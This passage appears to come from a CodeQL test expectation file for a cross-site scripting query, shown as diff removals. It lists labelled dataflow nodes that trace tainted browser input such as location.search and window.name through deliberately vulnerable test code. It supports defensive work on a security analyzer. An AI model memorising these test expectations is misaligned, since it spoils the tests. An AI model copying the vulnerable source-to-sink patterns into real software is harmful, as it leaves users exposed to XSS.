.search | -| optionalSanitizer.js:6:18:6:23 | target | semmle.label | target | -| optionalSanitizer.js:8:7:8:22 | tainted | semmle.label | tainted | -| optionalSanitizer.js:8:17:8:22 | target | semmle.label | target | -| optionalSanitizer.js:9:18:9:24 | tainted | semmle.label | tainted | -| optionalSanitizer.js:15:9:15:14 | target | semmle.label | target | -| optionalSanitizer.js:16:18:16:18 | x | semmle.label | x | -| optionalSanitizer.js:17:20:17:20 | x | semmle.label | x | -| optionalSanitizer.js:26:7:26:39 | target | semmle.label | target | -| optionalSanitizer.js:26:16:26:39 | documen ... .search | semmle.label | documen ... .search | -| optionalSanitizer.js:28:24:28:24 | x | semmle.label | x | -| optionalSanitizer.js:29:12:29:12 | x | semmle.label | x | -| optionalSanitizer.js:31:7:31:23 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:31:18:31:23 | target | semmle.label | target | -| optionalSanitizer.js:32:18:32:25 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:34:5:34:36 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | semmle.label | sanitiz ... inted2) | -| optionalSanitizer.js:34:28:34:35 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:36:18:36:25 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:38:7:38:23 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:38:18:38:23 | target | semmle.label | target | -| optionalSanitizer.js:39:18:39:25 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:41:5:41:36 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | semmle.label | sanitiz ... inted3) | -| optionalSanitizer.js:41:28:41:35 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:43:18:43:25 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | semmle.label | sanitiz ... 
target | -| optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | semmle.label | sanitizeBad(target) | -| optionalSanitizer.js:45:41:45:46 | target | semmle.label | target | -| optionalSanitizer.js:45:51:45:56 | target | semmle.label | target | -| pages/[id].jsx:3:30:3:35 | params [id] | semmle.label | params [id] | -| pages/[id].jsx:3:30:3:35 | params [q] | semmle.label | params [q] | -| pages/[id].jsx:5:9:5:14 | { id } | semmle.label | { id } | -| pages/[id].jsx:5:9:5:29 | id | semmle.label | id | -| pages/[id].jsx:5:18:5:29 | router.query | semmle.label | router.query | -| pages/[id].jsx:10:44:10:45 | id | semmle.label | id | -| pages/[id].jsx:13:44:13:49 | params [id] | semmle.label | params [id] | -| pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | -| pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | -| pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | semmle.label | {\\n ... ,\\n } [id] | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | semmle.label | {\\n ... ,\\n } [q] | -| pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | -| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | -| pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | -| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | semmle.label | context ... 
r \|\| "" | -| react-native.js:7:7:7:33 | tainted | semmle.label | tainted | -| react-native.js:7:17:7:33 | req.param("code") | semmle.label | req.param("code") | -| react-native.js:8:18:8:24 | tainted | semmle.label | tainted | -| react-native.js:9:27:9:33 | tainted | semmle.label | tainted | -| react-use-context.js:10:22:10:32 | window.name | semmle.label | window.name | -| react-use-context.js:16:26:16:36 | window.name | semmle.label | window.name | -| react-use-router.js:8:21:8:32 | router.query | semmle.label | router.query | -| react-use-router.js:8:21:8:39 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:11:24:11:35 | router.query | semmle.label | router.query | -| react-use-router.js:11:24:11:42 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:23:43:23:54 | router.query | semmle.label | router.query | -| react-use-router.js:23:43:23:61 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:33:21:33:32 | router.query | semmle.label | router.query | -| react-use-router.js:33:21:33:39 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-state.js:4:9:4:49 | state | semmle.label | state | -| react-use-state.js:4:38:4:48 | window.name | semmle.label | window.name | -| react-use-state.js:5:51:5:55 | state | semmle.label | state | -| react-use-state.js:9:9:9:43 | state | semmle.label | state | -| react-use-state.js:10:14:10:24 | window.name | semmle.label | window.name | -| react-use-state.js:11:51:11:55 | state | semmle.label | state | -| react-use-state.js:15:9:15:43 | state | semmle.label | state | -| react-use-state.js:15:10:15:14 | state | semmle.label | state | -| react-use-state.js:16:20:16:30 | window.name | semmle.label | window.name | -| react-use-state.js:17:51:17:55 | state | semmle.label | state | -| react-use-state.js:21:10:21:14 | state | semmle.label | state | -| react-use-state.js:22:14:22:17 | prev | semmle.label | prev | -| 
react-use-state.js:23:35:23:38 | prev | semmle.label | prev | -| react-use-state.js:25:20:25:30 | window.name | semmle.label | window.name | -| sanitiser.js:16:7:16:27 | tainted | semmle.label | tainted | -| sanitiser.js:16:17:16:27 | window.name | semmle.label | window.name | -| sanitiser.js:23:21:23:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:23:29:23:35 | tainted | semmle.label | tainted | -| sanitiser.js:30:21:30:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:30:29:30:35 | tainted | semmle.label | tainted | -| sanitiser.js:33:21:33:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:33:29:33:35 | tainted | semmle.label | tainted | -| sanitiser.js:38:21:38:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:38:29:38:35 | tainted | semmle.label | tainted | -| sanitiser.js:45:21:45:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:45:29:45:35 | tainted | semmle.label | tainted | -| sanitiser.js:48:19:48:25 | tainted | semmle.label | tainted | -| sanitiser.js:48:19:48:46 | tainted ... /g, '') | semmle.label | tainted ... /g, '') | -| stored-xss.js:2:39:2:62 | documen ... .search | semmle.label | documen ... .search | -| stored-xss.js:3:35:3:58 | documen ... .search | semmle.label | documen ... .search | -| stored-xss.js:5:20:5:52 | session ... ssion') | semmle.label | session ... ssion') | -| stored-xss.js:8:20:8:48 | localSt ... local') | semmle.label | localSt ... local') | -| stored-xss.js:10:9:10:44 | href | semmle.label | href | -| stored-xss.js:10:16:10:44 | localSt ... local') | semmle.label | localSt ... local') | -| stored-xss.js:12:20:12:54 | "" | semmle.label | "" | -| stored-xss.js:12:35:12:38 | href | semmle.label | href | -| string-manipulations.js:3:16:3:32 | document.location | semmle.label | document.location | -| string-manipulations.js:4:16:4:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:5:16:5:37 | documen ... 
on.href | semmle.label | documen ... on.href | -| string-manipulations.js:5:16:5:47 | documen ... lueOf() | semmle.label | documen ... lueOf() | -| string-manipulations.js:6:16:6:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:6:16:6:43 | documen ... f.sup() | semmle.label | documen ... f.sup() | -| string-manipulations.js:7:16:7:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:7:16:7:51 | documen ... rCase() | semmle.label | documen ... rCase() | -| string-manipulations.js:8:16:8:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:8:16:8:48 | documen ... mLeft() | semmle.label | documen ... mLeft() | -| string-manipulations.js:9:16:9:58 | String. ... n.href) | semmle.label | String. ... n.href) | -| string-manipulations.js:9:36:9:57 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:10:16:10:45 | String( ... n.href) | semmle.label | String( ... n.href) | -| string-manipulations.js:10:23:10:44 | documen ... on.href | semmle.label | documen ... 
on.href | -| tainted-url-suffix-arguments.js:3:17:3:17 | y | semmle.label | y | -| tainted-url-suffix-arguments.js:6:22:6:22 | y | semmle.label | y | -| tainted-url-suffix-arguments.js:11:11:11:36 | url | semmle.label | url | -| tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | semmle.label | window.location.href | -| tainted-url-suffix-arguments.js:12:17:12:19 | url | semmle.label | url | -| tooltip.jsx:6:11:6:30 | source | semmle.label | source | -| tooltip.jsx:6:20:6:30 | window.name | semmle.label | window.name | -| tooltip.jsx:10:25:10:30 | source | semmle.label | source | -| tooltip.jsx:11:25:11:30 | source | semmle.label | source | -| tooltip.jsx:17:11:17:33 | provide [source] | semmle.label | provide [source] | -| tooltip.jsx:17:21:17:33 | props.provide [source] | semmle.label | props.provide [source] | -| tooltip.jsx:18:51:18:57 | provide [source] | semmle.label | provide [source] | -| tooltip.jsx:18:51:18:59 | provide() | semmle.label | provide() | -| tooltip.jsx:22:11:22:30 | source | semmle.label | source | -| tooltip.jsx:22:20:22:30 | window.name | semmle.label | window.name | -| tooltip.jsx:23:38:23:43 | source | semmle.label | source | -| translate.js:6:7:6:39 | target | semmle.label | target | -| translate.js:6:16:6:39 | documen ... .search | semmle.label | documen ... .search | -| translate.js:7:7:7:61 | searchParams | semmle.label | searchParams | -| translate.js:7:7:7:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:7:22:7:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | -| translate.js:7:42:7:47 | target | semmle.label | target | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | -| trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | -| trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | -| trusted-types.js:3:62:3:62 | x | semmle.label | x | -| trusted-types.js:3:67:3:67 | x | semmle.label | x | -| trusted-types.js:4:20:4:30 | window.name | semmle.label | window.name | -| trusted-types.js:13:20:13:30 | window.name | semmle.label | window.name | -| tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | semmle.label | JSON.pa ... tr(1))) | -| tst3.js:2:23:2:74 | decodeU ... str(1)) | semmle.label | decodeU ... str(1)) | -| tst3.js:2:42:2:63 | window. ... .search | semmle.label | window. ... .search | -| tst3.js:2:42:2:73 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst3.js:4:25:4:28 | data | semmle.label | data | -| tst3.js:4:25:4:32 | data.src | semmle.label | data.src | -| tst3.js:5:26:5:29 | data | semmle.label | data | -| tst3.js:5:26:5:31 | data.p | semmle.label | data.p | -| tst3.js:7:32:7:35 | data | semmle.label | data | -| tst3.js:7:32:7:37 | data.p | semmle.label | data.p | -| tst3.js:9:37:9:40 | data | semmle.label | data | -| tst3.js:9:37:9:42 | data.p | semmle.label | data.p | -| tst3.js:10:38:10:41 | data | semmle.label | data | -| tst3.js:10:38:10:43 | data.p | semmle.label | data.p | -| tst.js:2:7:2:39 | target | semmle.label | target | -| tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | -| tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | -| typeahead.js:20:13:20:45 | target | semmle.label | target | -| typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | -| typeahead.js:21:12:21:17 | target | semmle.label | target | -| typeahead.js:24:30:24:32 | val | semmle.label | val | -| typeahead.js:25:18:25:20 | val | semmle.label | val | -| various-concat-obfuscations.js:2:6:2:39 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| various-concat-obfuscations.js:4:14:4:20 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | semmle.label | `
    $ ...
    ` | -| various-concat-obfuscations.js:5:12:5:18 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | semmle.label | "
    " ... ainted) | -| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | semmle.label | "
    " ... /div>") | -| various-concat-obfuscations.js:6:19:6:25 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | semmle.label | ["
    ... /div>"] | -| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | semmle.label | ["
    ... .join() | -| various-concat-obfuscations.js:7:14:7:20 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:9:4:9:34 | "
    " | semmle.label | "
    " | -| various-concat-obfuscations.js:9:19:9:25 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:10:4:10:27 | `
    ` | semmle.label | `
    ` | -| various-concat-obfuscations.js:10:16:10:22 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:11:4:11:31 | "
    ") | semmle.label | "
    ") | -| various-concat-obfuscations.js:11:24:11:30 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:12:4:12:34 | ["
    "] | semmle.label | ["
    "] | -| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '
